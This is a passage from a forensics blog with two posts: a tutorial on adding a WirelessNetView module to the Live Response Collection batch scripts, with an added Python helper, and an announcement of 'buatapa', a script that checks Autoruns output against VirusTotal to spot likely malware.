<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[MODULENAME] - is replaced with WIRELESSNETVIEW</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Tool path] - is replaced with wirelessnetview\WirelessNetView.exe</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[command line arguments] - is replaced with </span><span style="font-size: large;">/shtml</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Output folder] - is replaced with </span><span style="font-size: large;">NetworkInfo</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Output file name and file extension] - is replaced with Wirelessnetview.html</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Tool name] - is replaced with Wirelessnetview</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Executable name] - is replaced with WirelessNetView.exe</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">[Executable download location, if applicable] - is replaced with http://www.nirsoft.net/utils/wireless_network_view.html</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfSrNjvp3AE2vt6Gv_B4VN0t4KpV7BtG8t59bRp-iocQOZkNXBM-rFVkOQ9ZWQaSbeU-z7WCASfVkCfPFZZtkTUEzASsVa2GHAUiZHyhEHbAdeDzkzIvTEc9nluSKjrpV6M50Xs1-8cuzM/s1600/snippet-of-wnv.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfSrNjvp3AE2vt6Gv_B4VN0t4KpV7BtG8t59bRp-iocQOZkNXBM-rFVkOQ9ZWQaSbeU-z7WCASfVkCfPFZZtkTUEzASsVa2GHAUiZHyhEHbAdeDzkzIvTEc9nluSKjrpV6M50Xs1-8cuzM/s640/snippet-of-wnv.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Screenshot of our new module, after replacing the text!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now that our module is written, we have to add the module to whichever batch scripts we would like. I usually like to keep the modules that perform similar functions near each other, so in this case I am going to add it after the PRCVIEWMODULE. The easiest way to do this is simply to copy the five lines of text associated with the PRCVIEWMODULE entry and paste them directly below it.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirq4rW0yzlYRp8kVnPW61gq6_MyUwGwOh7RGcw9-0TGt7EGsWNghZMxPSZ8_AEvAxFipay4VzQEhhEei1M-Qro26Kt5d8KoahHrKGhKZN5B1ngInt6127SRk73T3Cob2xeUMz7cF4Sjyov/s1600/adding+module.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirq4rW0yzlYRp8kVnPW61gq6_MyUwGwOh7RGcw9-0TGt7EGsWNghZMxPSZ8_AEvAxFipay4VzQEhhEei1M-Qro26Kt5d8KoahHrKGhKZN5B1ngInt6127SRk73T3Cob2xeUMz7cF4Sjyov/s640/adding+module.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Selecting the code associated with PRCVIEWMODULE</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Xh32SdE1h37c7dMy0CzW0Xm1vR4XbvIwyLEIKdH-AJJKQOajNlSj8t5of983d7SUYnD_EyGDhhDb3lgBydNg_VN-9siRKmx2B6fH3KmcBjrWM_DIPGerwCk85tPLW04Lr0XmTCk2g33d/s1600/copied_module.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Xh32SdE1h37c7dMy0CzW0Xm1vR4XbvIwyLEIKdH-AJJKQOajNlSj8t5of983d7SUYnD_EyGDhhDb3lgBydNg_VN-9siRKmx2B6fH3KmcBjrWM_DIPGerwCk85tPLW04Lr0XmTCk2g33d/s640/copied_module.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Copying the code associated with PRCVIEWMODULE to create a new subroutine for our new module</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once you have it copied, change the <i>GOTO ....MODULE</i> line in the original (PRCVIEWMODULE) entry so that it points at your new module; in this case, we would change it to GOTO WIRELESSNETVIEWMODULE. Then change the label of the pasted copy to the name of your module, in this case WIRELESSNETVIEWMODULE. The pasted copy keeps the original GOTO target, so the chain continues on to the module that PRCVIEWMODULE used to jump to.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7D1j3shUVAC0GXbe3slmdnMlj2YRqKHY5cqAbfUWaIt1mLIBub0bPyTo0YBdgzyFFWQNYrxEuwg0eSeE7n39FImT5QJPPTFMRpC5u7p8BYKc61YbGmiUsUcrjep24_8a-Yj_j6uBpgYJo/s1600/addingwnvmodule.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7D1j3shUVAC0GXbe3slmdnMlj2YRqKHY5cqAbfUWaIt1mLIBub0bPyTo0YBdgzyFFWQNYrxEuwg0eSeE7n39FImT5QJPPTFMRpC5u7p8BYKc61YbGmiUsUcrjep24_8a-Yj_j6uBpgYJo/s640/addingwnvmodule.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Adding WIRELESSNETVIEWMODULE code</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Finally, in the pasted copy, change the name of the batch script that is being called to the name of your newly created script (wirelessnetview.bat), then save it. That is it, you are all done!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKR-FIG8gBONskKzcSvw_tWeii06OUvmR1UCnhxS8l0c29rYFd37lHQHzsdgegvkyqNikQL25S0YmG1blgirD8ehMy8jsQsiub3K4rEXSBTnWkZU0NZfKQoPzs82BxgP5uhW36xGGH0a99/s1600/alldone.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKR-FIG8gBONskKzcSvw_tWeii06OUvmR1UCnhxS8l0c29rYFd37lHQHzsdgegvkyqNikQL25S0YmG1blgirD8ehMy8jsQsiub3K4rEXSBTnWkZU0NZfKQoPzs82BxgP5uhW36xGGH0a99/s640/alldone.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i style="font-size: 12.8px;"><span style="font-size: small;">Our module is fully added!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">It is best to run your module(s) on a test system before deploying them widely, just to ensure that everything works properly. Also remember that a module only runs from the batch scripts it has been added to, so add the code for your new module to each of the six batch scripts in which you want it to run.</span><br />
<span style="font-size: large;"><br /></span>
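<span style="font-size: large;">As an added example that is not part of the original post or of the Live Response Collection itself, the Python helper below automates the two steps above: it applies the substitution table to a template in the right order, reports any placeholder left behind, and splices a new five-line subroutine after PRCVIEWMODULE while repointing the GOTO chain. The template text, the %TOOLS% and %OUTPUT% variable names, and the layout of the main-script entries are constructed stand-ins, since the real template and main script are not reproduced in the post; only the placeholder names and the substitution values come from the lists above.</span><br />
<span style="font-size: large;"><br /></span>

```python
import re

# Constructed stand-in for Windows-Module-Template.bat. Only the placeholders are
# taken from the post; the layout and the %TOOLS%/%OUTPUT% names are hypothetical.
TEMPLATE = """\
:: [MODULENAME] module for the Live Response Collection
:: Written YYYYMMDD (DD Month YYYY) by [Your Name] ([you@emailaddress])
:: Twitter: [Twitter name] ([@Twitterhandle])
:: Tool: [Tool name], executable [Executable name]
:: Source: [Executable download location, if applicable]
"%TOOLS%\\[Tool path]" [command line arguments] "%OUTPUT%\\[Output folder]\\[Output file name and file extension]"
"""

# The post's substitution table. Order matters for a plain find-and-replace:
# YYYYMMDD goes first because DD and YYYY are substrings of it.
WIRELESSNETVIEW = [
    ("YYYYMMDD", "20150917"), ("DD", "17"), ("Month", "September"), ("YYYY", "2015"),
    ("[Your Name]", "Brian Moran"), ("[you@emailaddress]", "brian@brimorlabs.com"),
    ("[Twitter name]", "BriMor Labs"), ("[@Twitterhandle]", "@BriMorLabs"),
    ("[MODULENAME]", "WIRELESSNETVIEW"),
    ("[Tool path]", r"wirelessnetview\WirelessNetView.exe"),
    ("[command line arguments]", "/shtml"),
    ("[Output folder]", "NetworkInfo"),
    ("[Output file name and file extension]", "Wirelessnetview.html"),
    ("[Tool name]", "Wirelessnetview"), ("[Executable name]", "WirelessNetView.exe"),
    ("[Executable download location, if applicable]",
     "http://www.nirsoft.net/utils/wireless_network_view.html"),
]

# Anything that still looks like a template placeholder after substitution.
PLACEHOLDER_RE = re.compile(r"\[[^\]\n]+\]|YYYYMMDD|\bDD\b|\bYYYY\b|\bMonth\b")

def render_module(template, substitutions):
    """Apply the find-and-replace table in the given order (Ctrl+H, automated)."""
    text = template
    for placeholder, value in substitutions:
        text = text.replace(placeholder, value)
    return text

def leftover_placeholders(text):
    """Placeholders that were forgotten, or that a wrong replacement order left behind."""
    return sorted(set(PLACEHOLDER_RE.findall(text)))

# Constructed excerpt of a main LRC batch script: each module is a five-line
# entry (label, echo, call, GOTO next, blank line), chained together by GOTO.
MAIN_SCRIPT = """\
:PRCVIEWMODULE
echo Running PRCVIEW module
call "%~dp0Windows-Modules\\prcview.bat"
GOTO NETSTATMODULE

:NETSTATMODULE
echo Running NETSTAT module
call "%~dp0Windows-Modules\\netstat.bat"
GOTO ENDMODULES

:ENDMODULES
"""

def add_module_after(script, after_module, new_module, bat_name):
    """Splice a new five-line entry after `after_module`, repointing its GOTO at
    the new module and making the new module jump to the old target."""
    lines = script.splitlines()
    start = lines.index(":" + after_module)
    goto_idx = next(i for i in range(start, len(lines)) if lines[i].upper().startswith("GOTO "))
    old_target = lines[goto_idx].split(None, 1)[1]
    lines[goto_idx] = "GOTO " + new_module
    short = new_module[:-len("MODULE")] if new_module.endswith("MODULE") else new_module
    new_entry = [":" + new_module, f"echo Running {short} module",
                 f'call "%~dp0Windows-Modules\\{bat_name}"', "GOTO " + old_target, ""]
    lines[goto_idx + 2:goto_idx + 2] = new_entry  # just past the entry's blank line
    return "\n".join(lines) + "\n"

def dangling_gotos(script):
    """GOTO targets with no matching label; an empty list means the chain is intact."""
    rows = script.splitlines()
    labels = {r[1:].strip().upper() for r in rows if r.startswith(":") and not r.startswith("::")}
    targets = [r.split(None, 1)[1].strip().upper() for r in rows if r.upper().startswith("GOTO ")]
    return [t for t in targets if t not in labels]

if __name__ == "__main__":
    module = render_module(TEMPLATE, WIRELESSNETVIEW)
    print(module, "leftover:", leftover_placeholders(module))
    script = add_module_after(MAIN_SCRIPT, "PRCVIEWMODULE", "WIRELESSNETVIEWMODULE", "wirelessnetview.bat")
    print(script, "dangling:", dangling_gotos(script))
```

<span style="font-size: large;">The dangling_gotos check is the one worth keeping around: a typo in either the new label or the GOTO that points at it makes cmd.exe abort the whole script with "The system cannot find the batch label specified", taking every later module with it. A run on a test system shows that too, but checking the chain takes seconds.</span><br />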
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I hope that this tutorial has been helpful, please do not hesitate to contact me if you have any additional questions or comments as you create your own modules for the Live Response Collection!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<br />
<a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" style="font-size: x-large;" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a><span style="font-size: large;"> </span><br />
<br style="font-size: x-large;" />
<span style="font-size: large;">MD5: 7bc32091c1e7d773162fbdc9455f6432</span><br />
<span style="font-size: large;">SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63</span><br />
<span style="font-size: large;">Updated: September 5, 2019</span><br />
<div>
<span style="font-size: large;"><br /></span></div>
<div>
<span style="font-size: large;"><br /></span></div>
<span style="font-size: large;"><br /></span><span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-29993176305514404182015-08-26T12:02:00.002-04:002018-01-30T11:06:20.638-05:00Publicly announcing buatapa!!<br />
<span style="font-size: large;">Hello again readers and welcome back! Today's blog post is going to cover a small script that I developed called "buatapa". This was meant to be released several months ago, but steady case work has kept me busy. I finally carved out some development time to finish up this blog post and push it out publicly at long last!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<b><span style="font-size: x-large;">buatapa</span></b><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">According to the magic of Google Translate, "bua tapa" is the Irish Gaelic translation of the phrase "quick win". </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pfLqciSeHIDrxWN5fZEU9SLylVbZJHSQE3glDoH4gsuLv2tJAk_C6JCi0COvh7qCNkdtrqWqRQMfdMLmg7kQ_RojllaIDo9YM9ecg4p4RVpYr5fzS6HeNLQqDxQo9_Z5upEzhEYeBGXJ/s1600/where_buatapa_came_from.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pfLqciSeHIDrxWN5fZEU9SLylVbZJHSQE3glDoH4gsuLv2tJAk_C6JCi0COvh7qCNkdtrqWqRQMfdMLmg7kQ_RojllaIDo9YM9ecg4p4RVpYr5fzS6HeNLQqDxQo9_Z5upEzhEYeBGXJ/s1600/where_buatapa_came_from.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>The phrase "quick win" translated to Irish Gaelic, thanks to Google Translate!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">I decided to call my (GASP!) first publicly released Python script "buatapa" for a couple of reasons, the main one being that it is very heavily based on <a href="https://twitter.com/bbaskin" target="_blank">Brian Baskin's</a> <a href="https://github.com/Rurik/Noriben" target="_blank">Noriben personal malware sandbox</a>, and I wanted it to have a cool name as well. The results of this script have the potential to indeed give you a "quick win" when trying to find malware on a Windows system.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b><u>What buatapa does</u></b></span><br />
<span style="font-size: large;"><br /></span><span style="font-size: large;">buatapa is meant to be run on a second machine against data you have already collected, rather than performing the VirusTotal queries from the suspected compromised system itself, since that system may have no network connectivity (a secured environment, a POS environment, etc.). It simply works by parsing the autoruns.csv that Sysinternals Autoruns generates on a Windows system. The script flags entries containing abnormal Unicode characters, anything that resembles a Poweliks Registry entry, and anything whose file does not carry a verified digital signature. It then attempts a VirusTotal hash lookup for the flagged files (those with abnormal characters and the unsigned entries) and returns the results in an easy-to-read text file.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><b><u>How to set up buatapa</u></b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The first thing that is required to get the fullest functionality is a VirusTotal API key. You can get your public API key by heading over to VirusTotal and signing up for an account, if you do not already have one.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once you have your account, log in to VirusTotal and choose the option under your username of "My API key"</span><br />
<br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnZqSvKf6C54oSubAjUbiRGFDDL05bWqfn6Xw2HfoFbzRGVF7_HhSCKHozbff_KCQje82DsakmiIekD0hTQXBSEdW8jDhapKb6k80pnj-YYuvIkkQMcBtkVfjCg_0HFLY371lRczlJHzJS/s1600/vt-login-apikey.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnZqSvKf6C54oSubAjUbiRGFDDL05bWqfn6Xw2HfoFbzRGVF7_HhSCKHozbff_KCQje82DsakmiIekD0hTQXBSEdW8jDhapKb6k80pnj-YYuvIkkQMcBtkVfjCg_0HFLY371lRczlJHzJS/s1600/vt-login-apikey.jpg" width="610" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>"My API key" option on VirusTotal</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">When you choose that option, you will be presented with a page like this, which contains your API key. </span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6tb2MbUaqOjhOL4q0Pzj53nGF6nxU2e00mW2BhFRv1xBINiazjkUV6FjvdSTbsz2xwaBuOGIUGTV0DaOYTWHvqsgqMgFEbinunb4ZhbKZW5HQC0iSQvzv8BlgsyeaNUjgsFnxtFS47jQ/s1600/page-with-api-key.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="546" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6tb2MbUaqOjhOL4q0Pzj53nGF6nxU2e00mW2BhFRv1xBINiazjkUV6FjvdSTbsz2xwaBuOGIUGTV0DaOYTWHvqsgqMgFEbinunb4ZhbKZW5HQC0iSQvzv8BlgsyeaNUjgsFnxtFS47jQ/s1600/page-with-api-key.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Page with your API key, settings, and rate limits</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Note that the public API is rate limited (four queries per minute), and the script honours that limit automatically: rather than running four queries in a row and then waiting for 60 seconds, I chose to do one query every 15 seconds. You can of course modify the script to change the sleep time and query rate if you would like.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Highlight your API key and paste it into the script. (It is the exact same code as Noriben, so if you are familiar with that, you should be familiar with this.) Treat that copy of the script as sensitive from then on: the key is a credential tied to your account, which is why the copy in the screenshots below is named "personal_buatapa.py".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE6bH206acX9zE4rJvm5NEezY31KXTlNHmEX7usqD_a0lgdsu_i9P_PObyqEV-EB2WUZGbzrnMZ0fpZ5hQWhtc1fO1QNtUHdLOqccFQ9lnwviatYKr6q8JLS8K1Xaq3MkLK9sn3wgk_6WU/s1600/put_in_api_key.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE6bH206acX9zE4rJvm5NEezY31KXTlNHmEX7usqD_a0lgdsu_i9P_PObyqEV-EB2WUZGbzrnMZ0fpZ5hQWhtc1fO1QNtUHdLOqccFQ9lnwviatYKr6q8JLS8K1Xaq3MkLK9sn3wgk_6WU/s1600/put_in_api_key.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Copy the API key to here (or here) in the script (buatapa and/or noriben)</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">It is very important to also install the "requests" Python library to your Python distribution if you have not already. I once again defer to Brian Baskin's Python experience (which admittedly dwarfs my own) as he stated:</span><br />
<span style="font-size: large;"><br /></span>
<i><span style="font-size: large;">"Without Requests it cannot do VirusTotal queries. That's the only internet-based functionality. So you have to install requests ("pip install requests")...Requests is the HTTP library that I use. The built-in Python libs are horrible."</span></i><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">So, make sure that you run the command 'pip install requests' from a command prompt before you run buatapa or Noriben, in order to get the internet functionality that the scripts need!!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRoAqJGffInY32gNczHiL8pO8x3d4OOu5k8lA7kgnwRtS2Wdno_nRxIuQwxojdC40F1xkjoeeAsyQh9mUQQ2jMFRca3LJCrr7vwybwFzbPlfn3flHEJedO9dz-5HawWHPnp2Me5Q6tD0mG/s1600/pipinstall.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRoAqJGffInY32gNczHiL8pO8x3d4OOu5k8lA7kgnwRtS2Wdno_nRxIuQwxojdC40F1xkjoeeAsyQh9mUQQ2jMFRca3LJCrr7vwybwFzbPlfn3flHEJedO9dz-5HawWHPnp2Me5Q6tD0mG/s640/pipinstall.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Type in 'pip install requests' from a command prompt to install Requests</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<b style="font-size: x-large;"><u>Running buatapa</u></b><br />
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">You will have to have Python either natively installed on your system or be running something like ActiveState Python in order to run buatapa. To run it, simply open a command prompt and give the path to where the buatapa script resides. The script automatically creates the output text file in the directory it was run from, so make sure you have read/write permissions to that directory. For example, do not run it from C:\Windows\System32 unless you opened the command prompt with Administrative privileges. You must give the script the "-c" argument pointing at the autoruns.csv file you want it to process.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNI4A-px97baDO1FQbDKUOn7Oepu4nj7VOsvmnqlKkpVk2ccVg-KWq7SLpQFluAA6tpDwkBHQDBiB76IZTNHNQzkmdvAknzMSz80_tQAPmKlZzcJICD_lP9np4y5gWO0N01-eupWDLmyST/s1600/buatapa-running-commandline.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNI4A-px97baDO1FQbDKUOn7Oepu4nj7VOsvmnqlKkpVk2ccVg-KWq7SLpQFluAA6tpDwkBHQDBiB76IZTNHNQzkmdvAknzMSz80_tQAPmKlZzcJICD_lP9np4y5gWO0N01-eupWDLmyST/s640/buatapa-running-commandline.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>The results from running buatapa (NOTE: The script is named "personal_buatapa.py" because it has my API key in it)</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">You do not have to use the Live Response Collection to create the autoruns.csv file (although I did include that output in the latest update, to make life easier for you if you do), but you do have to have the Autoruns output saved as a CSV for buatapa to process it. The text output of Autoruns, while easier for a human to read, is more difficult to parse and correlate than the CSV version.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b><u>Results from buatapa</u></b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The results are saved as a text file named "$DATE_$TIME_buatapa_output.txt" (for example 20150825_181703_buatapa_output.txt), with all of the information that Autoruns collects about the suspect entry presented in an easy-to-read text format. If a VirusTotal hit is found, the scan date, detection ratio, and VirusTotal report URL are presented at the very top of the entry.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwvnr1kKqbP2DEZlo4VQSS0dAgEaZI4lgNRCdkgJmxjuEosWMTuW1G0nJhyphenhyphenLsFTyeEBjEjV0gsqdC_zNDA-LbK5DF8bedrVbSEMDS7B6C3fC0x65vm_ZkH6Cf3v0tEp0lJHtqOt8DRwgsf/s1600/snippet-buatapa-results.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwvnr1kKqbP2DEZlo4VQSS0dAgEaZI4lgNRCdkgJmxjuEosWMTuW1G0nJhyphenhyphenLsFTyeEBjEjV0gsqdC_zNDA-LbK5DF8bedrVbSEMDS7B6C3fC0x65vm_ZkH6Cf3v0tEp0lJHtqOt8DRwgsf/s640/snippet-buatapa-results.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Screenshot of a snippet of the buatapa output</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">buatapa (by default) only looks at unsigned entries, but it also attempts to identify abnormal Unicode characters (anything that is not Windows CP-1252) as well as looking for entries that are similar to poweliks. You can change the defaults by giving the script different arguments, which can be seen with the -h or --help flag.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFiainkpfq4RV70eo4Vjbln69HB3YJfT4T-yAnR5gal3hvO7rqeyux4kPIPFnR1FB8SCoa_gVdkJZtaFmU5IrjrFmpQYS3eHFiLSi74E2iQTu2aeEuUy0tVXkRMRX06HylsTVmI_7K5Nts/s1600/buatap-usage.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFiainkpfq4RV70eo4Vjbln69HB3YJfT4T-yAnR5gal3hvO7rqeyux4kPIPFnR1FB8SCoa_gVdkJZtaFmU5IrjrFmpQYS3eHFiLSi74E2iQTu2aeEuUy0tVXkRMRX06HylsTVmI_7K5Nts/s640/buatap-usage.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">buatapa usage</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<br />
<span style="font-size: large;">buatapa is by no means meant to replace in-depth analysis; it is meant to provide a faster and easier way to identify potentially compromised systems. buatapa will likely not be able to identify incredibly well-hidden rootkits, digitally-signed malware or never-before-seen malware, as it is not meant to do that. It is meant to rapidly provide an easy-to-read list of files that have been identified by VirusTotal as likely being malware and that are set to automatically run in an area recognized by autoruns. It gives you a "quick win" in identifying the "low-hanging fruit" malware. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As I have said many times in the past (and will continue to say many times in the future) the malware will only be as sophisticated as it needs to be in order to gain access to the data your adversaries are after. If a piece of malware originally written four years ago can steal every credit card transaction in your environment, the adversary will use it. They will not use their "next generation Cloud 2.0 automatic exfiltration memory-only kernel-level rootkit" malware in the event that it might actually get discovered in an environment where very basic malware would suffice. <a href="http://www.brimorlabsblog.com/2014/09/spending-on-hardware-wont-fix.html" target="_blank">Remember the third party vendor used by Goodwill to process payments last year?</a> The malware that was allegedly used in that compromise displayed every single transaction in a command prompt window and had no method of persistence. If the window had simply been closed by ANY individual, even by accident, or if the system was rebooted, the compromise would have stopped. Hardly "advanced" or "sophisticated", but the malware <a href="http://krebsonsecurity.com/2014/09/breach-at-goodwill-vendor-lasted-18-months/" target="_blank">allegedly ran for 18 months</a> and resulted in <a href="http://www.darkreading.com/backoff-not-to-blame-for-goodwill-breach/d/d-id/1306963" target="_blank">868,000 compromised credit cards</a>.</span><br />
